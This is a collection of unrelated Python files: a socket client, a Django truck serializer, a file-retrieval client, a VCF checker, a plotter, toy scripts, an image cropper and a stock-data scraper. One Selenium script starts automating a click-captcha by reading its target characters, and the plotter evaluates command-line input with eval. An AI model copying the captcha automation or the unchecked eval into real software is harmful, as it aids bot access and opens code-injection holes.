PREVALsig3=np.array([7.225953663927309e-10 ,8.776091154105139e-09 ,2.0667198888407614e-08 ,3.434099158419224e-08 ,5.3710341601320675e-08 ,6.669689542426629e-08 ,8.495968125143614e-08 ,9.612584899225648e-08 ,1.0498647269978588e-07 ,1.0591133090066566e-07 ,1.1306276448433496e-07 ,1.1075389791870312e-07 ,1.1144771961951519e-07 ,1.1580329598893086e-07 ,1.1411867140064696e-07 ,1.199451065772577e-07 ,1.2416517298034608e-07 ,1.1999724145498257e-07 ,1.0732587318008887e-07 ,1.049280720090045e-07 ,9.55685508380541e-08 ,9.252294272094269e-08 ,7.737807752587672e-08 ,7.050581233003334e-08 ,5.683728323298476e-08 ,4.814726696920971e-08 ,4.086531141604165e-08 ,3.287701261057209e-08 ,2.6783037646764965e-08 ,2.1639817077430443e-08 ,1.6966697888024576e-08 ,1.3402852106480935e-08 ,1.0349915798413502e-08 ,7.026989430110767e-09 ,5.0627635804617635e-09 ,3.737863924645568e-09 ,2.4079666162927574e-09 ,1.5413959406184199e-09 ,8.874062678373296e-10 ,4.5903648646148474e-10])
# Interpolators over the tables; extrapolate outside the sampled range.
sigarr0=interpolate.interp1d(PREVALrs,PREVALsig0,bounds_error=False,fill_value="extrapolate")
sigarr1=interpolate.interp1d(PREVALrs,PREVALsig1,bounds_error=False,fill_value="extrapolate")
sigarr2=interpolate.interp1d(PREVALrs,PREVALsig2,bounds_error=False,fill_value="extrapolate")
sigarr3=interpolate.interp1d(PREVALrs,PREVALsig3,bounds_error=False,fill_value="extrapolate")
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 1 13:07:04 2019
@author: Sunny
"""
# The triple-quoted block below is an earlier interactive client, kept
# here disabled. NOTE(review): its `if say =='q' or 'exit':` condition is
# always true ('exit' is a non-empty string), so that loop would always
# break after one round-trip if re-enabled.
'''
import socket
#hostname = '127.0.0.1'
#port = 7777
#addr = (hostname,port)
#clientsock = socket.socket() ## 建立一個socket
#clientsock.connect(addr) # 建立連線
def main():
while True:
clientsock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsock.connect((socket.gethostname(),1234))
say = input("Type something:")
clientsock.send(bytes(say,encoding='gbk')) #傳送訊息
recvdata = clientsock.recv(1024) #接收訊息 recvdata 是bytes形式的
print(str(recvdata,encoding='gbk')) # 我們看不懂bytes,所以轉化為 str
if say =='q' or 'exit':
break
clientsock.close()
if __name__=='__main__':
main()
'''
import select
import socket

# Server endpoint for the one-shot request below.
HOST = '10.0.0.102'
PORT = 5566
timeout = 60 * 1  # 1 minute

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# BUG FIX: sendall() requires bytes on Python 3; the original passed a
# str, which raises TypeError.
s.sendall(b'msg')
# Switch to non-blocking mode and use select() to wait for a reply with a
# timeout instead of blocking forever in recv().
s.setblocking(0)
ready = select.select([s], [], [], timeout)
if ready[0]:
    # recv() returns bytes, so the NUL padding must be stripped with a
    # bytes argument (the original used a str argument -> TypeError).
    data = s.recv(1024).strip(b'\x00')
    print(data, repr(data))
from django.conf import settings
from rest_framework import serializers, validators
from locations.serializers import LocationSerializer
from .models import PaymentMethod, Truck, TruckImage
class TruckImageSerializer(serializers.ModelSerializer):
    """Serializer for a single truck image upload."""
    class Meta:
        model = TruckImage
        fields = ("id", "image")
    def validate_image(self, value):
        # Reject uploads larger than the project-wide byte limit
        # configured in settings.MAX_IMG_SIZE.
        if value.size > settings.MAX_IMG_SIZE:
            raise serializers.ValidationError("File size too big!")
        return value
class TruckSerializer(serializers.ModelSerializer):
    """Serializer for Truck objects with a read-only nested location,
    image URLs and human-readable payment method names.

    Incoming `payment_methods` and `image` values are read from the raw
    request data (multipart form), not from the validated payload.
    """
    location = LocationSerializer(
        read_only=True,
    )
    owner = serializers.PrimaryKeyRelatedField(
        read_only=True,
    )
    name = serializers.CharField(
        max_length=50,
        validators=[
            validators.UniqueValidator(queryset=Truck.confirmed.all())
        ],
    )
    images = serializers.SerializerMethodField()
    payment_methods = serializers.SerializerMethodField()

    class Meta:
        model = Truck
        fields = (
            "id",
            "owner",
            "name",
            "phone",
            "email",
            "facebook",
            "instagram",
            "page_url",
            "description",
            "city",
            "payment_methods",
            "images",
            "updated",
            "location",
        )

    def _get_payments(self, data):
        """Map the request's comma-separated `payment_methods` string to a
        list of PaymentMethod primary keys.

        Raises:
            serializers.ValidationError: when a name has no matching
                PaymentMethod (matched case-insensitively).
        """
        new_payments = []
        payments = data.get("payment_methods")
        for payment in payments.split(", "):
            try:
                filtered_payment = PaymentMethod.objects.get(
                    payment_name__iexact=payment
                ).id
            except PaymentMethod.DoesNotExist:
                raise serializers.ValidationError(
                    "Given payment method does not match"
                )
            new_payments.append(filtered_payment)
        return new_payments

    def create(self, validated_data):
        """Create a Truck and attach uploaded images and payment methods."""
        data = self.context.get("view").request.data
        new_payments = data.get("payment_methods", {})
        if new_payments:
            new_payments = self._get_payments(data)
        truck = Truck.objects.create(**validated_data)
        if data.get("image"):
            for image_data in data.getlist("image"):
                TruckImage.objects.create(truck=truck, image=image_data)
        truck.payment_methods.add(*new_payments)
        return truck

    def update(self, instance, validated_data):
        """Update a Truck.

        If an image is sent all previous images will be removed and new
        images will be associated. The same goes for the payment methods
        in case of PUT method or PATCH when `payment` is provided. When
        PATCH without `payment` keyword, old `payment` instances remain.

        (This text previously sat as a stray class-level string between
        ``create`` and ``update`` where it was evaluated and discarded;
        it is now the method's docstring.)
        """
        data = self.context.get("view").request.data
        method = self.context.get("view").request.method
        new_payments = data.get("payment_methods", {})
        if new_payments:
            new_payments = self._get_payments(data)
        if data.get("image"):
            images = instance.images.all()
            if images.exists():
                instance.images.all().delete()
            for image_data in data.getlist("image"):
                TruckImage.objects.create(truck=instance, image=image_data)
        if method in ("PUT", "PATCH") and new_payments:
            instance.payment_methods.clear()
            instance.payment_methods.add(*new_payments)
        return super().update(instance, validated_data)

    def get_images(self, obj):
        """Return the URLs of all images attached to the truck."""
        images = obj.images.all()
        return [img.image.url for img in images]

    def get_payment_methods(self, obj):
        """Return the truck's payment method names."""
        return obj.payment_methods.values_list("payment_name", flat=True)
|
#!/usr/bin/env python3
# -*- coding:UTF-8 -*-
__author__ = 'zachary'
"""
File Name: demo.py
Created Time: 2020-04-11 11:42:57
Last Modified:
"""
import re
from selenium import webdriver
from parsel import Selector
# Target page hosting the click-captcha demo.
url = 'http://www.porters.vip/captcha/clicks.html'
# Drive Firefox through the local geckodriver binary.
browser = webdriver.Firefox(executable_path='../geckodriver')
browser.get(url)
sel = Selector(browser.page_source)
# get verify requirement
require = sel.css('#divTips::text').get()
# print(require)
# Characters the captcha asks the user to click, pulled from between the
# CJK quotation marks in the prompt text.
target = re.findall('“(.)”', require)
# print(target)
|
import socket
import datetime
import sys
import os
# Server endpoint and socket tuning constants.
HOSTNAME = "127.0.0.1"
PORT = 8000
PROTOCOL = 0      # default protocol for socket(); currently unused below
TIMEOUT = 15      # socket timeout in seconds
MAX_SIZE = 1024   # max bytes read per recv()
QUEUE_SIZE = 5    # listen backlog; unused on the client side
# Pre-built keep-alive HTTP request lines for the three files served by
# the companion server.
FILE_A = "GET /a.jpg HTTP/1.1\r\nHost: 127.0.0.1:8000\r\nConnection: keep-alive\r\n\n"
FILE_B = "GET /b.mp3 HTTP/1.1\r\nHost: 127.0.0.1:8000\r\nConnection: keep-alive\r\n\n"
FILE_C = "GET /c.txt HTTP/1.1\r\nHost: 127.0.0.1:8000\r\nConnection: keep-alive\r\n\n"
files = [FILE_A, FILE_B, FILE_C]
def make_socket():
    """Create a TCP socket configured with the module-level TIMEOUT.

    Exits the process with status 1 if socket creation fails.
    """
    try:
        client = socket.socket()
        client.settimeout(TIMEOUT)
    except socket.error:
        print('socket creation has failed. ')
        sys.exit(1)
    return client
def connect(hostname, port):
    """Connect the module-level `sock` to (hostname, port) and perform the
    b'con' application handshake with the server.

    Returns the connection setup time in seconds; exits the process on
    connection failure or a bad handshake reply.

    NOTE(review): relies on the global `sock` created at module scope
    rather than receiving the socket as a parameter.
    """
    t1 = datetime.datetime.now()
    try:
        sock.connect((hostname,port))
    except socket.error:
        print("connection has been refused. ")
        sys.exit(1)
    # Handshake: send 'con' and expect the server to echo 'con' back.
    send_data(sock, 'con'.encode())
    data = receive_data(sock)
    if data != 'con'.encode():
        print('connection to server not acknowledged. ')
        sys.exit(1)
    t2 = datetime.datetime.now()
    return (t2-t1).total_seconds()
def send_data(sock, msg):
    """Send all of `msg` (bytes) on `sock`; exit the process on failure."""
    try:
        sock.sendall(msg)
        return
    except socket.error:
        pass
    print(" send message failed.")
    sys.exit(1)
def receive_data(sock):
    """Receive up to MAX_SIZE bytes from `sock` and return them; exit the
    process if the read fails."""
    try:
        return sock.recv(MAX_SIZE)
    except socket.error:
        print(" error in receiving data.")
        sys.exit(1)
def retrieve_file(sock, raw_filename, extension):
    """Receive one file from the server over `sock`, writing it to
    'retrieve_persistent_<raw_filename><extension>'.

    The transfer ends when the server sends b'fin' or the connection
    closes. Each received chunk is acknowledged with b'ack'. Returns the
    number of data packets received.
    """
    #Create a file to write to.
    filename='retrieve_persistent_' + raw_filename + extension
    file = open(filename, 'wb+')
    datum = True
    count = 0
    while datum:
        datum = receive_data(sock) #receive data from the socket
        if datum == 'fin'.encode() or not datum:
            break #if data == 'fin' or data is an empty string, break
        file.write(datum)
        count += 1
        send_data(sock, 'ack'.encode()) #send an acknowledge to the server
    file.close()
    return count
#main function
# Requests the three files over a single persistent connection, timing
# each transfer and counting received packets.
if __name__ == "__main__":
    total_time = 0
    packets_num = 0
    sock = make_socket()
    t0 = connect(HOSTNAME, PORT)  # NOTE(review): t0 is measured but never reported
    for file in files:
        # Pull e.g. 'a.jpg' out of the request line, then split extension.
        filename = file.split()[1][1:]
        raw_filename, file_ext = os.path.splitext(filename)
        t1 = datetime.datetime.now()
        # Record time before sending request.
        send_data(sock, file.encode()) # Send request to server.
        pkt_recn = retrieve_file(sock, raw_filename, file_ext) # Retrieve file, record number of packets received from server.
        t2 = datetime.datetime.now()
        # Record time after transaction.
        time_div = (t2-t1).total_seconds()
        print('retrieval time is {} seconds.'.format(time_div)) # Calculated time difference.
        total_time += time_div
        print('number of packets received = {}\n'.format(pkt_recn)) # Find the number of packets received.
        packets_num += pkt_recn
    print('total transaction time = {:.6f} seconds.'.format(total_time))
    print(' number of packets = {}'.format(packets_num))
    sock.close()
    sock = None
|
"""
@version 0
@author: Jetse
Quality control:
* Checked whether each column contains at least 8 columns
* Checked whether file contains at least a single SNP
"""
from qualityControl import QualityControlExceptions
class VcfFile:
    """Quality control for a VCF file.

    Checks that every data line has at least 8 columns and that the file
    contains at least one SNP.
    """
    def __init__(self, fileName, bcf=False):
        self.fileName = fileName  # path to the VCF/BCF file
        self.bcf = bcf            # True when the file is BCF (not used by isValid)

    def isValid(self):
        """Validate the file and return the number of SNPs found.

        Raises:
            QualityControlExceptions.FileFormatException: when a data line
                has fewer than 8 columns, or when no SNPs are present.
        """
        print("Checking: " + self.fileName)
        lineNo = 0
        snps = 0
        with open(self.fileName) as vcfReader:
            for line in vcfReader:
                # BUG FIX: the counter was previously incremented once
                # *before* the loop, so every error reported "line 1";
                # it now tracks the actual line number.
                lineNo += 1
                if line.startswith("#"):
                    continue
                elif line.isspace():
                    continue
                snps += 1
                columns = line.split()
                if len(columns) < 8:
                    raise QualityControlExceptions.FileFormatException("Too less columns in line {}, at least 8 expected, {} found".format(lineNo, len(columns)))
        if snps == 0:
            raise QualityControlExceptions.FileFormatException("No SNPs found in vcf file!")
        print("{} SNPs found in {}".format(snps,self.fileName))
        return snps
from DG_MMSFunctions import *
from numpy import *
import matplotlib
import matplotlib.pyplot as plt
import sys
# Function names to evaluate come from the command line; the final
# argument is the number of subplot rows.
functions = []
for arg in sys.argv[1:-1]:
    functions.append(arg)
n_rows = int(sys.argv[-1])
matplotlib.rcParams['xtick.direction'] = 'out'
matplotlib.rcParams['ytick.direction'] = 'out'
plt.subplots_adjust(left=None, bottom=None, right=None, top=None,
wspace=0.2, hspace=0.2)
# Sample each named function on a res x res grid over [0, pi]^2.
res = 50
X = linspace(0.0, pi, res)
Y = linspace(0.0, pi, res)
x = [0,0]
data = empty([len(functions), res, res])
for z, function in enumerate(functions):
    for j, x[0] in enumerate(X):
        for i, x[1] in enumerate(Y):
            # NOTE(review): double eval -- the named function (from the
            # star-imported DG_MMSFunctions module) is called and its
            # string result evaluated again. Only run with trusted
            # arguments; eval on untrusted input is unsafe.
            data[z,i,j] = eval(eval(function + "()"))
    # One contour subplot per function.
    # NOTE(review): len(functions)/n_rows yields a float on Python 3 --
    # presumably this script targets Python 2; confirm before porting.
    plt.subplot(n_rows, len(functions)/n_rows + 1, z+1)
    CS = plt.contour(X, Y, data[z])
    plt.clabel(CS, inline=1, fontsize=10)
    plt.title(functions[z])
plt.show()
|
def facebook():
    """Interactive Dutch-language questionnaire over stdin/stdout.

    Asks for the user's name and, with consent, a few personal questions;
    then offers to restart (by recursing into itself) or exits.
    """
    print("Hallo, wat is jou naam?")
    naam = input()
    print("Welkom", naam, "!")
    print("Mogen wij jou wat vragen? Ja/Nee")
    vraag = input().lower()
    if vraag == "nee":
        exit()
    # NOTE(review): any answer other than "ja"/"nee" falls through both
    # branches and the function simply returns.
    if vraag == "ja":
        print("Top! Laten we beginnen.")
        print(naam, "hoe oud ben jij?")
        leeftijd = input()
        print("Oke, je bent dus", leeftijd, "Jaar")
        print("Waar woon jij?")
        woonplaats = input()
        print("Heb jij broers of zussen?")
        enigskind = input()
        print("Wat voor werk doe je?")
        werk = input()
        print("Oke, leuk dat je", werk, "als werk doet!")
        print("Dit was het programma, wil je opnieuw beginnen? ja/nee")
        opnieuw = input().lower()
        if opnieuw == "ja":
            # Restart by recursion; each restart adds a stack frame.
            return facebook()
        else:
            exit()
facebook()
|
# Python 2 script (print statements, raw_input). Greets known users by
# name in an endless loop.
known_users=['Alice', 'Bob', 'Claire', 'Dam','Emma']
# NOTE(review): this loop has no break, so it repeats forever; stop with
# Ctrl-C -- confirm whether that is intended.
while True:
    print "Hi! My Name is Travis"
    name=raw_input("What is your name?:").strip().capitalize()
    if name in known_users:
        print 'Hello {}!'.format(name)
    else:
        print 'i dont think i have met you'
|
import glob
import os
from PIL import Image
# Batch-crop and shrink every PNG in the current directory.
outdir = 'cropped'   # destination directory for the processed images
scale = 1.3          # shrink factor applied after cropping
# Crop box as (left, upper, right, lower) pixel coordinates.
BBOX = [600, 176, 1417, 795]

# BUG FIX: create the output directory up front; previously save() failed
# with FileNotFoundError whenever 'cropped' did not already exist.
os.makedirs(outdir, exist_ok=True)

files = glob.glob('./*.png')
for file in files:
    print('process %s' % file)
    inimage = Image.open(file).crop(BBOX)
    width, height = inimage.size
    # Shrink with bilinear resampling and save under the same base name
    # inside the output directory.
    inimage.resize((int(width/scale), int(height/scale)), Image.BILINEAR).save(os.path.join(outdir, os.path.basename(file)))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#上面的注释是用来支持中文,没有就会出错
# 注意 本文件是根据 index.py 复制修改的
# 基本上复用了 index.py 的逻辑,下面是修改的地方
# 1)原来的递归解构没了
# 2)没有数据库相关的操作(所以没有网页版本)
# 3) 命令行参数是需要查询的股票
from __future__ import division
#这个需要先 pip install requests
import requests
import json
import math
import time
import argparse #用来获取命令行参数
import sys
#导入自己写的
import dataBase
import exportFile
import getCookie
import myEmail
import common
import FA
# Load settings (auth cookie, user agent, ...) from the local JSON config.
conf = common.loadJsonFile('./config.json')
# Request header values
#cookie = getCookie.getCookie('https://xueqiu.com/');
cookie = conf['cookie']
userAgent = conf['userAgent']
# Query configuration; nowTime (ms since epoch) acts as a cache-buster.
nowTime = str(int(time.time() * 1000));
# Parameters for the stock screener endpoint.
config = [
    'category=SH',
    'exchange=',
    'areacode=',
    'indcode=',
    'orderby=symbol',
    'order=desc',
    'current=ALL',
    'pct=ALL',
    'pb=0_2', #PB
    'pettm=0_20', #PE/TTM
    'pelyr=0_20', #PE/LYR
    '_='+nowTime,
];
# Parameters for the daily K-line endpoint.
config2 = [
    'period=1day',
    'type=before',
    '_='+nowTime,
];
# Parameters for the quote/detail endpoint.
config3 = [
    '_='+nowTime,
];
# Budget per industry (yuan), used for the buy recommendation.
industryPrice = 10000;
# Sleep between API calls (seconds) to keep the request rate low.
sleep1 = 0;
sleep2 = 1;
sleep3 = 1;
# Data sources to scrape.
baseUrl = 'https://xueqiu.com/stock';
screenerAPI = baseUrl+'/screener/screen.json'; # screener/search
stockAPI = baseUrl+'/forchartk/stocklist.json'; # daily K-line data
stockInfoAPI = 'https://xueqiu.com/v4/stock/quote.json'; # quote details
# Accumulated list of processed stock records.
stockArr = []
# Number of records processed so far (progress indicator).
dealNum = 0
# Whether to wipe the database and re-scrape from scratch.
isClearOld = False
# Timestamp of the data grab (set from the first non-halted stock).
grabTime = '';
# Default stock when no CLI argument is given ("Ping An Bank").
symbolCode = 'SZ000001'
# Read the stock symbol from the command line, if provided.
if __name__ == '__main__':
    try:
        argArr = sys.argv
        if(len(argArr)>=2):
            symbolCode = argArr[1]
    except:
        sys.exit(0)
# Whether to clear old data (disabled).
#dataBase.clearOldDatabase(isClearOld);
# Stock record factory: builds the plain dict describing one analysed stock.
def Stock(name=0, symbol=1, lows=None, percents=None, info=None, averagePrecent=0, lastPrecent=0, continueDays=0, continueDaysText='', upOrDownPercent=0, upOrDownContinuePercent=0, halt=False, cashFlow=None, profit=0, nameStr="股票名称"):
    """Return a dict describing one stock analysis result.

    BUG FIX: `lows`, `percents`, `info` and `cashFlow` previously used
    mutable default arguments ([] / {}), which Python shares across calls
    -- mutating one record's defaulted container leaked into every later
    record. `None` sentinels with fresh containers per call fix that.
    """
    return{
        "name" : name,
        "symbol" : symbol,
        "lows" : [] if lows is None else lows,
        "percents" : [] if percents is None else percents,
        "info" : {} if info is None else info,
        "averagePrecent" : averagePrecent,
        "lastPrecent" : lastPrecent,
        "continueDays" : continueDays,
        "continueDaysText" : continueDaysText,
        "upOrDownPercent" : upOrDownPercent,
        "upOrDownContinuePercent" : upOrDownContinuePercent,
        "halt" : halt,
        "cashFlow" : [] if cashFlow is None else cashFlow,
        "profit" : profit,
        "nameStr" : nameStr,
    }
# Lightweight JSON wrapper: exposes top-level JSON keys as attributes.
class Payload(object):
    def __init__(self, j):
        """Parse JSON string `j` and expose its keys as attributes."""
        parsed = json.loads(j)
        self.__dict__ = parsed
# Fetch page N of the screener results.
def getScreenerData(url,config,page):
    """Fetch page `page` of the screener endpoint and return the raw
    response body (text).

    Uses the module-level `cookie` / `userAgent` for the request headers.
    """
    _headers = {
        "User-Agent":userAgent,
        "Cookie":cookie
    }
    _params = "&".join(config);
    _params = _params + '&page=' + str(page);
    # Throttling (disabled): keep the request rate low.
    # print '接口1:检索接口,休息一下'
    # time.sleep(sleep1);
    res = requests.get(url=url,params=_params,headers=_headers)
    return res.text;
# Originally a recursive fetch of every screener page; this variant just
# builds one record for the requested symbol.
def getAllData(page=0,stockArr=[]):
    """Build the full analysis record for `symbolCode`, append it to
    `stockArr` and return the list.

    NOTE(review): `stockArr=[]` is a mutable default argument; harmless
    while the function is called exactly once, but fragile. `page` is
    unused in this single-stock variant.
    """
    # Stand-in for the screener response: one entry for symbolCode.
    data = {
        "count": 1,
        "list": [{
            "symbol": symbolCode,
            "name": symbolCode
        }]
    }
    arr = data["list"];
    # Globals assigned inside a function must be declared here.
    global dealNum;
    # Total number of stock records.
    count = data["count"];
    totalPages = int(math.ceil(count/30))
    # Process each stock on this "page".
    for one in arr:
        # Progress bookkeeping.
        dealNum = dealNum + 1;
        perc = round((dealNum/count),3)*100;
        name = one['name'];
        symbol = one['symbol'];
        print('您查询的股票是:'+name)
        print('---------------------------------------------------------------------------------------------------------------')
        # Skip stocks already stored in the database (disabled).
        # cursor = dataBase.getStock(symbol);
        # if cursor.count()>=1:
        # for document in cursor:
        # oneStock = document
        # print(name+u' 已经存在数据库中,不再处理')
        # print('--------------------------------------------------------------------------------------------------------------- '+str(perc)+'%')
        # stockArr.append(oneStock);
        # continue
        # Core extraction part 1: yearly lows (uses API #2).
        lows = getLowPriceArr(symbol,6);
        # Sell-point ratios per year.
        percents = getSellPercent(lows);
        # Consecutive rise/fall streak (length and label).
        continueDays = lows[2];
        continueDaysText = lows[3];
        # Latest daily change and the summed change over the streak.
        upOrDownPercent = lows[4];
        upOrDownContinuePercent = lows[5];
        # Core extraction part 2: quote details (uses API #3).
        info = getStockInfoData(stockInfoAPI,config3,symbol);
        # Extra keys kept for sorting.
        averagePrecent = percents[1];
        lastPrecent = percents[0][0];
        # Trading-halt flag.
        halt = info['halt']
        # Financial analysis (cash flow and profit statements).
        cashFlow = FA.parseCfstatementData(symbol)
        profit = FA.parseIncstatementData(symbol)
        # Display name, re-fetched from the quote API.
        nameStr = info['nameStr']
        # Assemble the complete record.
        oneStock = Stock(
            name,
            symbol,
            lows,
            percents,
            info,
            averagePrecent,
            lastPrecent,
            continueDays,
            continueDaysText,
            upOrDownPercent,
            upOrDownContinuePercent,
            halt,
            cashFlow,
            profit,
            nameStr,
        );
        # Console report.
        print(u"【"+oneStock['nameStr']+u"】")
        print(oneStock['lows'][3].encode("utf-8") + ',合计涨/跌百分比:'+ str(oneStock['lows'][5]) + '%,当天' + str(oneStock['lows'][4])+ '%')
        print('推荐购买' + str(oneStock['info']['buyNum2']) +'('+ str(oneStock['info']['buyNum']) +')')
        print('成本为 ' + str(oneStock['info']['buyNum2']*oneStock['lows'][1]) + ' 元(每股 ' + str(oneStock['lows'][1]) +')')
        print('【PB/TTM/LYR】'+ str(oneStock['info']['pb']) +'/'+ str(oneStock['info']['pe_ttm'])+'/'+ str(oneStock['info']['pe_lyr']))
        # NOTE(review): the next line only makes sense on Python 2, where
        # `print (...) + '%/' ...` is a print *statement* of the whole
        # concatenation; on Python 3 it would be print(...) + str and raise.
        print('【EPS/每股净资产/ROE(季)/ROE(年)】'+ str(oneStock['info']['eps']) +'/'+ str(oneStock['info']['net_assets'])+'/'+ str(oneStock['info']['roe']))+ '%/'+ str(oneStock['info']['roe2'])+ '%'
        print('N年内低点 ' + str(oneStock['lows'][0]))
        print('N年内卖点占比 '+ str(oneStock['percents'][0]) +',平均 '+ str(oneStock['percents'][1]))
        print('总股本' + str(oneStock['info']['totalShares2'])+ '亿')
        print('最近季度利润' + str(oneStock['profit'][1])+ '亿')
        print(oneStock['profit'][0])
        print(oneStock['cashFlow'][0])
        print(oneStock['cashFlow'][1])
        print(oneStock['cashFlow'][2])
        print('--------------------------------------------------------------------------------------------------------------- '+str(perc)+'%')
        # Persist to the database (disabled).
        #dataBase.save(oneStock);
        # Keep the record in memory; the whole list is used at the end for
        # the txt export so that sorting can happen in one pass.
        stockArr.append(oneStock);
    return stockArr;
# Fetch `nYear` years of daily prices for one stock.
def getStockDetail(url,config,symbol,nYear):
    """Fetch `nYear` years of daily K-line data for `symbol` and return
    the raw response body (text).

    Uses the module-level `cookie` / `userAgent` for request headers.
    """
    _year = nYear;
    _interval = int(_year * 31536000 * 1000);  # nYear years in milliseconds
    # Must be int: downstream arithmetic breaks on float timestamps.
    _end = int(time.time() * 1000);
    _begin = _end - _interval;
    _headers = {
        "User-Agent":userAgent,
        "Cookie":cookie
    }
    _params = "&".join(config);
    _params = _params+'&symbol='+symbol;
    _params = _params+'&end='+ str(_end);
    _params = _params+'&begin='+ str(_begin);
    # Throttling (disabled).
    # time.sleep(sleep2);
    try:
        res = requests.get(url=url,params=_params,headers=_headers)
    except Exception:
        # BUG FIX: the original bare except swallowed the error and then
        # crashed with a NameError on `res.text`; log and propagate the
        # real exception instead.
        print('【xm】接口2有点问题哦')
        raise
    return res.text;
# Lowest price of the stock within the n-th year window.
def getLowPrice(n,data):
    """Return [lowest price, sample count] for the (n+1)-year window.

    `data` is a list of dicts with 'time' (e.g. 'Mon Jun 19 00:00:00 2017'
    -- the timezone token is stripped by the caller) and 'low'. Only
    entries whose timestamp falls within the last (n+1) years count.
    When the window is empty the low is the sentinel -999 so the stock can
    be filtered out downstream; the sample count is used by the caller to
    detect windows that add no new data.
    """
    lows = []
    myLen=0
    _interval = int( (n+1)*31536000*1000 );
    _now = int(time.time() * 1000);
    _begin = _now - _interval;
    for one in data:
        mytime = one['time']
        timestamp = time.mktime( time.strptime(mytime, "%a %b %d %H:%M:%S %Y") )
        # Scale to milliseconds and truncate for comparison with _begin.
        timestamp = int(timestamp * 1000);
        if timestamp>= _begin:
            lows.append(one['low']);
            myLen=myLen+1;
    if len(lows)==0:
        # print() form is valid on both Python 2 and 3 (the original used
        # a Python 2 print statement).
        print("该年份没有数据(可能已经停牌了有一年多了...)")
        # Sentinel keeps the pipeline running; -999 prices are filtered later.
        lows = [-999]
    # min() replaces the roundabout sorted(lows)[:1][0].
    m = min(lows)
    return [m,myLen];
# Length of the most recent consecutive up/down streak.
def getContinuityDay(arr):
    """Count consecutive rising (+) or falling (-) days.

    `arr` holds closing prices ordered most-recent first. Returns a
    positive count for a rising streak, a negative count for a falling
    streak, and 0 when the two most recent prices are equal.
    """
    # Direction of the streak: +1 rising, -1 falling, 0 flat.
    if arr[0] > arr[1]:
        direction = 1
    elif arr[0] < arr[1]:
        direction = -1
    else:
        direction = 0
    # Walk backwards in time while the streak continues.
    streak = 0
    for idx in range(1, len(arr)):
        if direction == 1 and arr[idx] < arr[idx-1]:
            streak += 1
        elif direction == -1 and arr[idx] > arr[idx-1]:
            streak -= 1
        else:
            break
    return streak
# Fetch six years of daily prices for one stock and derive summary data.
def getLowPriceArr(symbol,nYear):
    """Return [yearly lows, latest close, streak length, streak label,
    latest daily %, summed streak %] for `symbol` over `nYear` years.
    """
    total = nYear
    # A single API call covers all years; the per-year windows are carved
    # out locally to keep the request rate down (previously six calls).
    stockInfo = getStockDetail(stockAPI,config2,symbol,nYear)
    # Strip the timezone token so strptime can parse the timestamps.
    stockInfo = stockInfo.replace('+0800 ','')
    arr = Payload(stockInfo).chartlist
    # Latest daily percent change.
    upOrDownPercent = arr[-1]["percent"];
    # Use the latest close as the current price for the analysis.
    newClosePrice = arr[-1]["close"];
    # Collect [low, sample count] for the 1st..Nth year windows.
    arr2 = []
    while nYear>0:
        low = getLowPrice( total-nYear , arr )
        nYear = nYear-1;
        arr2.append(low)
    arr3 = modData(arr2)
    # Streak of consecutive up/down days over the last 10 closes.
    if len(arr) < 10 :
        # Newly listed stocks can have only a couple of data points.
        print('警告,这里数据有点问题!可能是一只新股')
        lastTenDays = [
            0,0,0,0,0,0,0,0,0,0,
        ]
    else:
        lastTenDays = [
            arr[-1]["close"],
            arr[-2]["close"],
            arr[-3]["close"],
            arr[-4]["close"],
            arr[-5]["close"],
            arr[-6]["close"],
            arr[-7]["close"],
            arr[-8]["close"],
            arr[-9]["close"],
            arr[-10]["close"],
        ]
    continueDays = getContinuityDay(lastTenDays)
    continueDaysAbs = abs(continueDays) # absolute streak length
    # Human-readable streak label (涨 rise / 跌 fall / 平 flat).
    continueDaysText = ''
    if continueDays>0:
        continueDaysText = u'涨'+str(continueDaysAbs)
    elif continueDays<0:
        continueDaysText = u'跌'+str(continueDaysAbs)
    else:
        continueDaysText = u'平'
    # Summed percent change over the streak.
    upOrDownContinuePercent = getUpOrDownPercent(arr,continueDaysAbs)
    return [ arr3, newClosePrice, continueDays,continueDaysText,upOrDownPercent,upOrDownContinuePercent]
# Sum of the daily changes over the current streak.
def getUpOrDownPercent(arr,continueDaysAbs):
    """Sum the 'percent' values of the last `continueDaysAbs` entries of
    `arr` (a list of dicts ordered oldest first)."""
    recent = (arr[-1*index-1]["percent"] for index in range(continueDaysAbs))
    return sum(recent)
# Adjust the yearly [low, count] pairs.
# Example input:  [[18.91, 241], [18.91, 486], [11.11, 732], [10.51, 732], [9.68, 732], [9.68, 732]]
# From year 4 on the sample count stops growing, meaning those years hold
# no data of their own, so their lows become the -999 sentinel:
#                 [[18.91, 241], [18.91, 486], [11.11, 732], [-999, 732], [-999, 732], [-999, 732]]
# which is then flattened to: [18.91, 18.91, 11.11, -999, -999, -999]
def modData(arr):
    """Flatten [[low, count], ...] into a list of lows, writing the -999
    sentinel into any year whose sample count equals the previous year's.

    Mutates `arr` in place (sentinels are written back) and returns the
    list of low prices. -999 is used instead of 0 because 0 (and even
    small negatives) can be legitimate values.
    """
    for idx in range(1, len(arr)):
        if arr[idx][1] == arr[idx-1][1]:
            # This year adds no new samples -> mark it as missing.
            arr[idx][0] = -999
    return [pair[0] for pair in arr]
# Per-year sell-point ratios and their average.
def getSellPercent(arr):
    """Compute sell-point ratios for each year window and their average.

    `arr` is `[lowArr, price, ...]` as returned by getLowPriceArr: the
    six yearly lows and the latest close. Each ratio is
    price / (low * multiplier), with the multiplier growing for older
    windows. Returns [ratios, average], all rounded to 3 places.
    """
    lowArr = arr[0]   # yearly low prices
    price = arr[1]    # latest closing price
    multipliers = (2, 2.4, 2.8, 3.2, 3.6, 4)
    percentArr = [round(price/(low*mult), 3) for low, mult in zip(lowArr, multipliers)]
    avg = round(sum(percentArr)/6, 3)
    return [percentArr, avg]
# Fetch quote details (PB, PE, ROE, ...) for one stock.
def getStockInfoData(url,config,symbol):
    """Return a dict of valuation metrics and buy recommendations for
    `symbol`, parsed from the quote API.

    Also records the grab time into the module-level `grabTime`, taken
    from the first stock that is not suspended from trading.
    """
    _headers = {
        "User-Agent":userAgent,
        "Cookie":cookie
    }
    _params = "&".join(config);
    _params = _params + '&code=' + symbol;
    # Throttling (disabled).
    # time.sleep(sleep3);
    res = requests.get(url=url,params=_params,headers=_headers)
    data = json.loads(res.text);
    nameStr = data[symbol]['name'];
    pe_ttm = round(float(data[symbol]['pe_ttm']),2);
